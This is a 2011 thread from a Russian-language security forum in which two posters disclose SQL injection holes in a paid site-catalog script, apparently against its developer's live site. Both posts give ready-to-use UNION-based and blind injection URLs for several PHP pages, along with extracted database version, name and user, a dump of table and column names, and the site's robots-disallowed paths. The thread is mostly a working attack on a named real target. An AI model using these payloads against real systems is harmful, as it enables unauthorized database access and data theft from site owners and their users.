HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.01.2011, 02:14
[Dark Green]
Новичок
Регистрация: 13.05.2010
Сообщений: 11
Провел на форуме:
118828

Репутация: 13
По умолчанию

Сайт разработчика: http://valdis.org.ru Исходников нет, ибо скрипт платный и в паблике его нет. его вообще нигде нет, кроме как у автора, я не нашел во всяком случае =\

SQL inj в site.php?id=

Код:
Code:
http://valdis.org.ru/site.php?id=2758+and+1=0+union+select+version(),2,3,4,5,6,7,8,database(),user(),11,12,13,14,15,16,17--
5.0.81-community

valdis_valdis

valdis_valdis@localhost


Структура БД:

Код:
Code:
table_name ; column_name

stat_valdis ; id,  ip,  date, page, ref, user
catid ; catid, catname, catstatus, cattitle
link ;  link_id,  link_project_id, link_category_id, link_manufacter_id, link_name,  link_len, link_status
site ; siteid, sitesubid, sitedomain, sitestatus, sitetitle, sitename, siteurl, sitedescription, sitekeywords, siterecip, siteaddemail, siteadddate, sitelastdate, sitehost
Запрещено к индексированию:

Код:
Code:
/gotosite.php
/google
/goget
/context.php
/gosite.php
/img.php
/contact.php
/xap.php
/alfa.php
/partner.php
/add1.php
/sape.php
/sot.php
/hosting.php
/test
/article
/sotmarket.php
/jamba
/image.php
/shop.php?magaz=otziv_add
/shop.php?magaz=otziv_view
/shop.php?magaz=topic
 
Ответить с цитированием

  #2  
Старый 06.01.2011, 17:43
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

SQL injection:

/add.php

Пример:

Код:
Code:
http://valdis.org.ru/add.php?id=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7--
Blind SQL injection:

/cat.php

Пример:

Код:
Code:
http://valdis.org.ru/cat.php?id=7%20and%20substring(@@version,1,1)=5
SQL injection:

/sub.php

Пример:

Код:
Code:
http://valdis.org.ru/sub.php?id=-54%20union%20select%201,2,concat_ws(0x3a,user(),database(),version()),4,5,6--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ